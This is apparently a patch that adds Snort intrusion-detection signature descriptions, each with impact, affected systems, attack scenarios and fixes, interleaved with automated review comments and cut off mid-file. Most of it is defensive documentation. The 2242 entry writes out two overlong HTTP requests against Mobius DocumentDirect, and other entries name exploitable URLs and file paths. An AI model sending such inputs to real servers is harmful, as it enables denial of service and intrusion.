+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerablity in Microsoft RPCSS service for RPC.
+
+--
+Impact:
+Denial of Service. Possible execution of arbitrary code leading to
+unauthorized remote administrative access.
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPCSS Service that handles RPC DCOM
+requests such that execution of arbitrary code or a Denial of Service 
+condition can be issued against a host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to the host
+running the RPCSS service may result in a buffer overflow condition that
+will present the attacker with the opportunity to execute arbitrary code
+with the privileges of the local system account. Alternatively the
+attacker could also cause the RPC service to stop answering RPC requests
+and thus cause a Denial of Service condition to occur.
+
+--
+Affected Systems:
+	Windows NT 4.0 Workstation and Server
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a DCERPC bind request followed by a malicious
+DCERPC DCOM remote activation request.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139, 445 and 593 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Disallow the use of RPC over HTTP and HTTPS.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-039.asp
+
+eEye:
+http://www.eeye.com/html/Research/Advisories/AD20030910.html
+
+--
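Review bot: Two typos: "vulnerablity" in the Summary should be "vulnerability", and "Expoit code exists" in Ease of Attack should be "Exploit code exists". The Detailed Information line "condition can be issued against a host" and the firewall line in Corrective Action end in trailing whitespace. The MS03-039 and eEye references are the right kind of entry for the empty Additional References sections elsewhere in this patch.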
--- /dev/null
+++ b/doc/signatures/2332.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid: 
+2332
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an FTP server.
+
+--
+Impact:
+Possible execution of arbitrary code.
+
+--
+Detailed Information:
+FTP is used to transfer files between hosts. This event is indicative of spurious
+activity in FTP traffic between hosts.
+
+It is possible for a user to supply data to an FTP ommand and have it
+interpreted as code. The attacker might then be able to run code of
+their choosing with the privileges of the user running the FTP service.
+
+--
+Affected Systems:
+	PlatinumFTP PlatinumFTPserver 1.0.18
+
+--
+Attack Scenarios:
+An attacker might utilize a vulnerability in an FTP daemon to gain access to a 
+host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Upgrade to the latest non-affected version of the software.
+
+Disallow access to FTP resources from hosts external to the protected network.
+
+Use secure shell (ssh) to transfer files as a replacement for FTP.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
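Review bot: Typo in Detailed Information, "an FTP ommand" should be "an FTP command". The Summary speaks generically of "an FTP server" while Affected Systems names only PlatinumFTPserver 1.0.18; naming the product in the Summary would make the event far easier to triage. The first Detailed Information line and the first Attack Scenarios line run past the wrap width used in the rest of the file.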
--- /dev/null
+++ b/doc/signatures/948.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+948
+
+--
+
+Summary:
+This event is generated when an attempt is made to access a file with 
+Microsoft Frontpage form results.
+
+--
+
+Impact:
+If successful, the attacker can read sensitive data users have posted 
+via forms within the Frontpage web.
+
+--
+
+Detailed Information:
+On systems running Microsoft Frontpage Extensions on IIS or Apache web 
+servers users can insert forms into web pages and have their data saved 
+into a text file (/_private/form_results.txt) which can later be read or
+emailed to the user. If direct access to the file is possible, the 
+attacker may read the sensitive data posted from the form.
+
+--
+
+Affected Systems:
+All systems running FPSE.
+
+--
+
+Attack Scenarios:
+An attacker can request the file from its standard location, entering 
+the exact URL.
+
+--
+
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known.
+
+--
+
+Corrective Action:
+Disable direct access to the file /_private/form_results.txt
+
+Restrict access to the file using password protection.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1460.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1460
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
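Review bot: Typo in Detailed Information, "running ona web server" should be "running on a web server", and "the attackers choosing" (twice) should be "the attacker's choosing". The line "relationships between the victim server and other hosts can be exploited by the attacker." was not wrapped to the width of the surrounding text. Additional References is empty.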
--- /dev/null
+++ b/doc/signatures/2242.txt
@@ -0,0 +1,69 @@
+Rule:  
+
+--
+Sid:
+2242
+
+--
+Summary:
+This event is generated when an attempt is made to 
+
+--
+Impact:
+Serious. Denial of Service and Execution of arbitrary code are both
+possible
+
+--
+Detailed Information:
+Mobius DocumentDirect for the Internet 1.2 contains programming errors
+which can present an attacker with the opportunity to issue a Denial of
+Service condition against the affected host and also the possiblity to
+execute arbitrary code.
+
+--
+Affected Systems:
+	Mobius DocumentDirect for the Internet 1.2
+
+--
+Attack Scenarios:
+According to David Litchfield and Mark Litchfield the following
+scenarios are possible:
+
+DoS:
+GET /ddrint/bin/ddicgi.exe?[string at least 1553 characters long]=X HTTP/1.0
+
+Buffer overflow:
+GET /ddrint/bin/ddicgi.exe HTTP/1.0\r\nUser-Agent: [long string of characters]\r\n\r\n
+
+The attacker could also supply a username greater than 208 characters
+which will cause a DoS condition to occur.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/1657
+
+--
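Review bot: The Summary is truncated: "This event is generated when an attempt is made to " ends mid-sentence, so the file as committed does not say what the rule detects; the Detailed Information suggests it should continue with the DocumentDirect ddicgi.exe request described there. Typo: "possiblity" should be "possibility". Minor: the Impact sentence lacks a terminating period.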
--- /dev/null
+++ b/doc/signatures/1191.txt
@@ -0,0 +1,81 @@
+Rule:  
+
+--
+Sid:
+1191
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in some versions of Netscape Enterprise Server.
+ 
+--
+Impact:
+Information leak which could provide an attacker with the data needed to
+launch further attacks or gain more detailed information about your web
+server. Also, the html-rend command can be used to launch denial of
+service attacks. 
+
+--
+Detailed Information:
+A user can see a directory listing by appending a Web Publishing command
+to the end of a directory URL, for example: "http://www.sun.com/?wp-html-rend".
+
+This exploit will work on Netscape Enterprise Server regardless of
+directory indexing settings.  
+
+It will not work on iPlanet Web Server if directory indexing is set to
+"none" or "fancy" (the default). Web Publishing need not be enabled for
+this exploit to work.
+
+Additionally, on Windows NT and Windows 2000, a specially crafted URL
+can use this command to cause an access violation error and crash the web server. 
+
+--
+Affected Systems:
+	Netscape Enterprise Server 3.0, 3.51 and 3.6
+
+--
+Attack Scenarios:
+The gathering of information such as directory listings is valuable when
+planning to attack a web server. Also, this command may be used to carry
+out a denial of service (DoS) attack. 
+
+--
+Ease of Attack:
+Simple. No exploit software required however, an automated tool for
+scanning exists as does an exploit script.
+
+--
+False Positives:
+A web server that uses URLs which contain web publishing commands.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Disable directory indexing. For earlier versions of Netscape Enterprise
+Server, this may not fix the problem. On iPlanet, you can also change
+the indexing type to "fancy".
+
+To fix the potential DOS vulnerability, upgrade to at least iWS 4.1 SP8.
+
+--
+Contributors:
+Snort documentation contributed by Kevin Peuhkurinen
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+iPlanet Knowledge Base Article 4302:
+http://knowledgebase.iplanet.com/ikb/kb/articles/4302.html 
+
+iPlanet Knowledge Base Article 7761:
+http://knowledgebase.iplanet.com/ikb/kb/articles/7761.html 
+
+--
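Review bot: The example URL in Detailed Information points at a real third-party host ("http://www.sun.com/?wp-html-rend"); documentation examples should use a reserved name such as example.com so nobody copies a live target into a test. The Impact section calls the command "html-rend" while the example and the rest of the text use "wp-html-rend"; use one form. Minor: "DOS" in Corrective Action should be "DoS" as elsewhere, and several lines end in trailing whitespace.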
--- /dev/null
+++ b/doc/signatures/3234.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3234
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
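Review bot: This file is identical to 3166.txt earlier in the patch except for the Sid, so a reader cannot tell what the two rules detect differently; each file should state its own matched pattern or at least cross-reference the other (the 1337.txt file shows the "sid:" reference convention). The same two issues apply here: "Expoit code exists" should be "Exploit code exists", and Attack Scenarios (overly long filename via a network share) does not match the malformed RPC data described in Detailed Information.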
--- /dev/null
+++ b/doc/signatures/681.txt
@@ -0,0 +1,80 @@
+Rule:  
+
+--
+Sid: 
+681
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+Affected Systems:
+	Microsoft SQL Servers
+
+--
+
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/en-us/tsqlref/ts_xp_aa-sz_4jxo.asp
+
+--
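Review bot: the third paragraph of Detailed Information, `+This connection can either be a legitimate telnet connection or the` / `+result of spawning a remote shell as a consequence of a successful` / `+network exploit.`, looks pasted from a telnet rule description and does not apply to a command sent to an SQL server; drop it or reword it to describe the SQL session. `Attack Scenarios: Simple. These are SQL database commands.` is an ease-of-attack statement rather than a scenario; describe what the attacker does with the command. The MSDN reference points at the xp_* extended stored procedure pages, but the text never says which command sid 681 matches and the `Rule:` field at the top is empty; name the command so the False Positives advice about administrators can be checked against it.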
--- /dev/null
+++ b/doc/signatures/2831.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2831
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure create_master_repobject
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
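Review bot: the procedure name is broken across three lines in Detailed Information, `+vulnerability in the procedure create_master_repobject` / `+. This procedure is included in` / `+sys.dbms_repcat_mas.`; join them into one sentence so the period is not stranded at the start of a line. `Oracle Oracle9i` under Affected Systems repeats the vendor name. Additional References is empty although Corrective Action says to apply the vendor patch; cite the Oracle alert that carries it.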
--- /dev/null
+++ b/doc/signatures/100000657.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000657
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "homepage" parameter in the "guestbook.php" 
+script used by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
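Review bot: Impact and Detailed Information overstate a cross site scripting issue: `+arbitrary code of the attackers choosing in some cases.` and `+be possible for an attacker to retrieve sensitive data, execute system binaries` describe server-side code execution, which script injected through the "homepage" parameter of guestbook.php does not give. Limit the impact to the client side (theft of session data, altered page content), as the Attack Scenarios paragraph already does. `attackers` should be `attacker's`. Formatting: the `--` separators after the Sid, Affected Systems and Contributors sections lack the blank line used elsewhere in the file.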
--- /dev/null
+++ b/doc/signatures/100000142.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+100000142
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+directory traversal associated with Imail Web Calendaring
+servicel
+
+--
+Impact:
+A successful attack can permit a user to navigate outside
+of the web root directory and read files.
+
+--
+Detailed Information:
+The Imail Web Calendaring Server does not properly sanitize
+a malformed URL that contains directory traversal characters.
+This vulnerability is associated with static objects identified
+by names ending in .jsp, .jpg, .gif, .wav, .css, or .htm.  This
+can permit an unauthorized user to examine files that may contain
+sensitive information.
+
+--
+Affected Systems:
+Ipswitch IMail Server 8.2 and prior
+Ipswitch IMail Server 8.15 and prior
+
+--
+Attack Scenarios:
+An attacker send a URI containing a directory traversal to view
+sensitive files on a vulnerable server.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the most current non-affected version of the product.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+Other:
+
+--
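Review bot: typo at the end of the Summary, `+servicel` should be `service.`; under Attack Scenarios `+An attacker send a URI` should read `An attacker sends a URI`. The product is spelled `Imail` in Summary and Detailed Information but `IMail` under Affected Systems; use one spelling. The closing header `+Additional References` is missing its colon and the `Other:` entry under it is empty; either cite the vendor advisory for this traversal or remove the empty entry.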
--- /dev/null
+++ b/doc/signatures/880.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+880
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
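Review bot: typo in Detailed Information, `+access to a CGI application running ona web server.` should be `on a web server`. The description is entirely generic: no script, URI or parameter is named and the `Rule:` field is empty, so the reader cannot tell what sid 880 matches or judge the `None known.` False Positives claim; name the CGI script the rule looks for, as the other web-application descriptions in this patch do.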
--- /dev/null
+++ b/doc/signatures/403.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+403
+
+--
+
+Summary:
+This event is generated when An ICMP Precedence Cutoff In Effect datagram is detected on the network.  
+
+--
+
+Impact:
+Routers will generate this message when a minimum precedence level has been configured for the network.  This could be an indication of improperly configured routing equipment or network host.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
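Review bot: Corrective Action, `+This rule detects informational network information, no corrective action is necessary.`, contradicts Impact, which says the datagram `could be an indication of improperly configured routing equipment or network host`; say that the sending router and the hosts it reports on should be checked when these events are frequent. Grammar: `+This event is generated when An ICMP Precedence Cutoff` (lower-case `an`), `+could indication routing problems` should be `could indicate routing problems`, and the Corrective Action sentence is a comma splice. The file also lacks the Affected Systems section used in the other descriptions.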
--- /dev/null
+++ b/doc/signatures/snort-sid-template.txt
@@ -0,0 +1,48 @@
+# This is a template for submitting snort signature descriptions to
+# the snort.org website
+#
+# Ensure that your descriptions are your own
+# and not the work of others.  References in the rules themselves
+# should be used for linking to other's work. 
+#
+# If you are unsure of some part of a rule, use that as a commentary
+# and someone else perhaps will be able to fix it.
+# 
+# $Id: snort-sid-template.txt,v 1.1 2002/10/09 13:06:31 cazz Exp $
+#
+# 
+
+Rule:  
+
+--
+Sid:
+
+--
+Summary:
+
+--
+Impact:
+
+--
+Detailed Information:
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+
+--
+False Positives:
+
+--
+False Negatives:
+
+--
+Corrective Action:
+
+--
+Contributors:
+
+-- 
+Additional References:
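Review bot: the template ends at `+Additional References:` without the closing `--` separator that every other file in this patch uses, and it has no Affected Systems section although the descriptions do; add both so files generated from it match the existing layout. Minor: `+should be used for linking to other's work.` should be `others' work`.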
--- /dev/null
+++ b/doc/signatures/1449.txt
@@ -0,0 +1,70 @@
+Rule:
+  
+--
+Sid:
+1449
+
+--
+
+Summary:
+This event is generated when an attempt is made to log on anonymously to an ftp server.
+
+--
+
+Impact:
+Information gathering, further exploit/abuse possible.
+
+--
+
+Detailed Information:
+Anonymous logins are usually the first step in the process of gathering 
+data about a machine running the ftp server. The ftp server might be 
+abused for hosting illegal content or an exploit could be performed, 
+gaining elevated privileges.
+
+--
+
+Affected Systems:
+Machines running anonymous ftp servers.
+
+--
+
+Attack Scenarios:
+The attacker can run an automated script over a range of IP addresses to
+detect ftp servers that allow anonymous access and create a list of such
+servers, to be used later.
+
+--
+
+Ease of Attack:
+Simple.
+
+--
+
+False Positives:
+If the ftp server allows anonymous login to occur, this rule will 
+generate an event.
+
+--
+
+False Negatives:
+Attacker might use a username 'anonymous' instead of 'ftp' to gain 
+anonymous access.
+
+--
+
+Corrective Action:
+Disable anonymous access on your ftp server.
+
+--
+
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+
+-- 
+
+Additional References:
+
+--
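Review bot: the False Negatives entry, `+Attacker might use a username 'anonymous' instead of 'ftp' to gain` / `+anonymous access.`, implies the rule matches only one of the two conventional anonymous usernames, but the `Rule:` field at the top of the file is empty so the reader cannot check which one; fill in the rule text. Corrective Action `Disable anonymous access on your ftp server.` should be qualified: the False Positives entry already says the event fires on servers that intentionally allow anonymous login, so the advice applies only where anonymous access is not wanted.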
--- /dev/null
+++ b/doc/signatures/2696.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2696
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure is_master
+. This procedure is included in
+sys.dbms_repcat_utl.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
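Review bot: the procedure name is split across lines in Detailed Information, `+vulnerability in the procedure is_master` / `+. This procedure is included in` / `+sys.dbms_repcat_utl.`; join these into one sentence. `Oracle Oracle9i` repeats the vendor name, and Additional References is empty although Corrective Action says to apply the vendor patch; cite the Oracle alert.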
--- /dev/null
+++ b/doc/signatures/1722.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1722
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
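Review bot: this description is word for word the same as 880.txt, including the `+access to a CGI application running ona web server.` typo, and neither names the CGI script its rule matches. Sids 880 and 1722 are different rules, so each Detailed Information should say which script or URI is detected; fix the typo in both files.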
--- /dev/null
+++ b/doc/signatures/2943.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2943
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
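Review bot: the last Corrective Action item, `+Disallow remote registry manipulation.`, does not follow from anything in the description, which never mentions the registry; either explain the connection or drop it. Attack Scenarios says `+attacker may gain complete control over the affected system.`, but Detailed Information only supports a Denial of Service through shutdown; align the two. `False Positives: None known.` is doubtful for a shutdown request over SMB, since administrators shut hosts down remotely with management tools; say that legitimate administrative shutdowns will trigger this event.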
--- /dev/null
+++ b/doc/signatures/2883.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2883
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
